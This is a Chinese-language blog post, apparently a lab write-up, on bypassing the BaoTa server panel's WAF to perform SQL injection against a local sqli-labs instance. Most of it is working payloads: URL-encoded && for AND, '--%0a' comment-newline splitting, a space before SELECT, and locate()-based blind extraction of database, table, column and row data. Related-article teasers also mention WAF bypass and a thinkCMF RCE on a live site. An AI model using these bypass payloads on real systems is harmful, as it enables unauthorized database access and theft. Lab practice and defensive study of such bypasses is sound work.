WAF - SQL注入绕过宝塔 靶场实战

最新推荐文章于 2024-05-11 07:05:21 发布
最新推荐文章于 2024-05-11 07:05:21 发布
阅读量6.1k 收藏 42
点赞数 1
文章标签: 渗透测试 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54771278/article/details/117388614
版权

实验介绍

宝塔面板是广东堡塔安全技术有限公司研发的服务器管理工具,是一家专门从事服务器相关软件及服务研发的公司,宝塔的愿景就是让使用者更简便的使用服务器。宝塔面板是一款服务器管理软件,支持windows和linux系统,可以通过Web端轻松管理服务器,提升运维效率。例如:创建管理网站、FTP、数据库,拥有可视化文件管理器,可视化软件管理器,可视化CPU、内存、流量监控图表,计划任务等功能。

宝塔面板拥有网站的防护功能,可以防止sql注入,挂马,cc攻击等网站入侵的功能

 

实验目的

1.掌握sql注入绕过宝塔技巧

2.了解宝塔面板过滤方式

 

实验开始

第一步:

首先我们测试注入点,结果如下图所示

1 or 1=1    拦截               1 and 1=1   拦截             1 || 1=1        拦截

 

第二步:

id=1 %26%26 1=1   通过

在这里我们使用&&替换and关键字来做判断,在SQL语法中&&等价于and关键字,然后利用URL编码对关键字内容&&url编码,怕和传递多个参数的&字符冲突,&字符编码后对应为%26,我们发现可以通过此方法绕过

接着我们继续尝试

 

第三步:

1 && (select 1)=1 && 1=1  拦截

 

第四步:

1 && ( select 1)=1 && 1=1   通过

猜测可能匹配到了SQL语句中携带select关键字,符合拦截规则而被拦截,在select前面补空格就可以绕过

 

第五步:

1 and( select database()='security') and 1=1   拦截

尝试把数据库名称跑出来这里利用databases()函数获取当前数据库名称被拦截了

这里猜测拦截的是database()函数,同理猜测可能是关键字拦截

 

第六步:

1 and( select database/**/()='security') and1=1 拦截   中间加注释符操作绕过验证失败

 

1 &&( select database--%0a()='security') &&1=1  通过

这里使用了 --换行(换行转化对应的URL编码为%0a

 

 

第七步:

解释一下这里--%0a为注释后面代码的然后换行,Mysql换行后的代码还是可以跟着上一行的执行,这样可以实现绕过。由于宝塔拦截的MySql函数还是挺多的,但是庞大的mysql函数库,还怕他不成,从上外下试了挺多个函数后,找到了一两个可以用的函数,这里拿locate()举例,该函数表示参数1的值是否在参数2里,是的话返回真,否则返回假,那我们开始来猜解.

id=1 &&locate('s',( select database--%0a())) &&1=1  返回真

 

第八步:

这里其实可以给locate加个判断,看第一个字符是什么再进行猜解,例如

id=1 &&(locate('s',( select database--%0a())))=1&&1=1返回真  表示第一个字段是s

id=1 &&locate('b',( select database--%0a())) &&1=1返回假  

 

第九步:

id=1&&(locate('se',(select database--%0a())))=1&&1=1 为真。

 

id=1&&(locate('sa',(select database--%0a())))=1&&1=1为假。

 

第十步:

一路下来,大概猜解流程就是这样

id=1&&(locate('security',(selectdatabase--%0a())))=1&&1=1 返回真

我们就知道数据库名security

接着就是猜表了

 

第十一步:

id=1&&locate('e',(select table_name frominformation_schema.tables where

table_schema='security' limit 0,1)) &&1=1  拦截

我们发现在进行get注入时候发现拦截。

 

 

我们猜测是select from这个参数被拦截。

 

 

第十二步:

当我们去掉from之后我们发现宝塔不对我们的请求进行拦截

http://192.168.0.121/sqli-labs-master/Less-1/?id=1'   %26%26 locate('e',( select 1 )) %26%26 1=1

 

第十三步:

然后我们发现改成post型传入发现不拦截,可能是宝塔的注入问题

 

第十四步:

这样我们就换到11post注入来抓包,我猜出了第一个表,表名为emails。就不一一猜解了,接着猜字段,查询到第一个字段id

1&&locate('id',(select column_name from information_schema.columns 

where table_schema='security' and table_name='emails' limit 0,1))

&&1=1

接着我们查询内容

 

第十五步:

1 &&locate('1',(select id from emails limit 0,1))&&1=1  拦截

1 && (select locate('1',id)from emails limit 0,1)  &&1=1  拦截

1 &&(select--%0alocate('1',id)from emails limit 0,1) &&1=1  拦截

 

第十六步:

1 &&( select--%0alocate('1',id)from emails limit 0,1) &&1=1   通过

我们在select前面加一个空格,就可以绕过了。

 

PS:在这里我就不爆所有内容了  思路都是一样的

总得来说在绕过宝塔的时候有一些规则还是我们需要去思考的,像在select frompost不拦截,get拦截,这种绕过就有一定的局限性

花,太阳,彩虹,你,
关注
  • 1
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
渗透测试waf绕过基础
qi_SJQ_的博客
01-28 3716
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 思维导图 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 思维导图: 一、信息收集 此处只针对对于目标网站直接扫描的信息收集讲解,其他辅助信息收集手段如:查旁站/识别cms等手段也不会遇到waf拦截。 1.安全狗—防ddos cenos目前用的不熟练,于是我将服务器系统换成了winserver,搭建上web环境和安全狗,打开cc拦截开关,本地.
深入waf绕过 (云盾,宝塔,安全狗)(19)
san3144393495的博客
05-07 3605
这个意思是他接受php后面的参数id,这个静态资源什么意思,这个waf很有可能过滤的是基于脚本类型的参数,也就是针对这种脚本类型的文件在进行过滤,针对某一些其他格式就不会过滤,比如图片格式文本格式,因为图片和文本格式一般不会带参数,造成不了危害,只有脚本里面有代码,或者是图片的代码没有危害,waf设计的时候就针对脚本格式和后缀里面的参数进行拦截,从网络层获取的 ip,这种一般伪造不来,如果是获取客户端的 IP,这样就可能存在伪造 IP 绕过的情。从请求来的数据包里面添加上面这五类。第二种方式 静态资源。
2024年最全深入waf绕过 (云盾,宝塔,安全狗)(19(1),2024年最新字节大牛耗时八个月又一力作
最新发布
2401_84545830的博客
05-11 625
这里说一下mysql数据库的特性,只限于MySQL数据库,/*!这句sql语句的意思是,如果数据库的版本大于5.00.1,就执行这一段sql语句,如果不大于就不执行这段sql语句,50001是可变的。演示一下也是一种绕过方式,不过是mysql特有的。对sql语句的编译有很多,下面这些都是在第二关可执行的语句这种最好写个脚本跑。重点开始阿里云盾防sql注入简要分析。
(18)【WAF绕过WAF部署、绕过分析和原理、注入绕过WAF方法
02-27 6810
WAF绕过
SQL注入绕过WAF详解
qq_66291050的博客
05-20 500
SQL注入绕过WAF详解SQL注入绕过WAF详解。
宝塔面板的sql注入绕过
weixin_48421613的博客
03-24 7974
一次宝塔sql注入绕过宝塔防护sql注入尝试联合查询的尝试布尔盲注尝试真假盲注运用 宝塔防护 在一次挖cvnd漏洞的时候,遇到了宝塔面板的防护,此waf屏蔽了传统的注释符“–+”、"#"、 “/*” , union select 做了防护而且似乎还做了过滤,废了半天劲绕过去发现联合查询不能被执行了,order by 虽然能用但是也没了卵用,搞了半天搞了个寂寞,正当我就要放弃的时候,我想起了使用布尔盲注,结果…玛德法克… sql注入尝试 老生常谈了哈,日站第一步当然需要确定是不是真的存在sql注入 输入单
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入中的WAF绕过技术
08-19
SQL注入中的WAF绕过技术,里面的思路很好,可以学习一下
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAF(Web Application Firewall)的常见特征是指其具有审计...
第18天:WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
WEB 漏洞-SQL 注入之堆叠及 WAF 绕过注入 SQL 注入是一种常见的 WEB 漏洞攻击方式,通过将恶意 SQL 语句嵌入到 Web 应用程序的输入参数中,从而访问、修改或控制数据库的数据。堆叠注入(Stacked Injections)是 ...
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
04-waf绕过权限控制
qq_56414082的博客
04-20 571
echo $str;echo $$str;?说明:1、s t r 的 变 量 的 值 为 字 符 串 v a r 2 、 str的变量的值为字符串 var2、str的变量的值为字符串var2、s t r 为 一 个 可 变 变 量 , str为一个可变变量,str为一个可变变量,str的值为 var 则 $$str 等同于 $var。
实战|记一次绕过宝塔防火墙的BC站渗透
热门推荐
zhangge3663的博客
05-06 1万+
0x00 信息收集 由于主站存在云waf 一测就封 且初步测试不存在能用得上的洞 所以转战分站 希望能通过分站获得有价值的信息 这是一个查询代理帐号的站 url输入admin 自动跳转至后台 看这个参数,猜测可能是thinkCMF 0x01 getshell thinkcmf正好有一个RCE 可以尝试一下 ?a=fetch&templateFile=public/index&prefix='' &content=<php>file_put_content
宝塔下的免费 waf 防火墙对比】
m0_63660506的博客
06-28 705
最近搭建了一个网站以后,总觉得裸奔的网站非常不安全,需要加上防护措施。加一套 waf 防火墙,然后就可以安心的睡觉了。因为服务器使用了宝塔管理,所以我需要既能跟宝塔一起用的 waf
SQL注入-SQL注入WAF绕过(十六)
Gjqhs的博客
02-22 1507
实验目的 普及熟悉利用重写等方式绕过WAF关键字过滤、以实现SQL注入的方法。PS:面试时不要说打靶场什么东西,就说重复大小写什么之类的 实验环境 攻击机:一直游到海水变蓝 (1)操作系统:Windows10 (2)安装的应用软件:sqlmap、Burpsuite、FireFox浏览器插件Hackbar、 FoxyProxy等 (3)登录账号密码:操作系统帐号Admin,密码qazwsx 靶机:化身孤岛的蓝鲸 (1)操作系统:本机(建议用虚拟机,特别是公司系统都是Linux)不过我太懒了(‾◡◝)
记一次SQL注入绕过宝塔+云waf
2301_80115097的博客
12-27 543
发现这两个没有回应真实ip,就去看看用fofa或者hunter来在真实ip,hunter上面显示183是云厂商肯定是云waf,不能用这个ip。首先判断出字符型的话,就得去测试’||||’ ‘or+or’的语句,但是我发现他这里只要是在两个or之间出现东西,就一定会触发宝塔waf。看看这函数怎么搞的,把里面的语句替换成1,看看哪里出了问题,发包,发现他这个1直接爆出来了。既然这函数可以用,那我们就开始构造语句试试,正常的语句用不了,那我们就玩点不正常的。哟西,果然能行,出库名了,成功绕过waf
SQL注入绕过WAF
qq_66291050的博客
05-27 284
14400and*/ 1=1,也行,内联注入14400是版本号,大于或等于这个版本号是有意义的,否则没有用。迪总这时候CTRL C+V搞的注入语句,特殊符号是URL编码的,但是迪总把编码还原了之后我们可以发现是被拦截了的,这还是一个玄学问题,哈。根据迪总的说法是宝塔,之类的,比较难,要一步一个脚印,先吃下酒菜,那就是安全狗,先把简单的绕过,困难的就慢慢来。/***/这么写,安全狗是不会对其检测的,不理解的话,我们来看看MYSQL数据库中是怎么理解这段语句的。很成功的绕过了,是吧,那么显存位是1,2,3。
WAFsql注入绕过
Wangguan2931的博客
07-15 585
sql注入绕过
深入waf绕过 (云盾,宝塔(1),2024年最新网络安全研发岗必问30+道高级面试题
2401_84264408的博客
04-11 565
从网络层获取的 ip,这种一般伪造不来,如果是获取客户端的 IP,这样就可能存在伪造 IP 绕过的情况。测试方法:修改 http 的 header 来 bypass wafX-Real-ip第二种方法我们是说这个IP地址是通过上面形式获取,在数据包里面,但是要看数据包里面waf的接受方式,因为在这个实战情况下面,他有可能接受你的IP地址是从网络层(tcp/ip)层面接受,如果这个层次数据库修改是不会接受的,意义不大,条件实在是太多,从请求来的数据包里面添加上面这五类。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值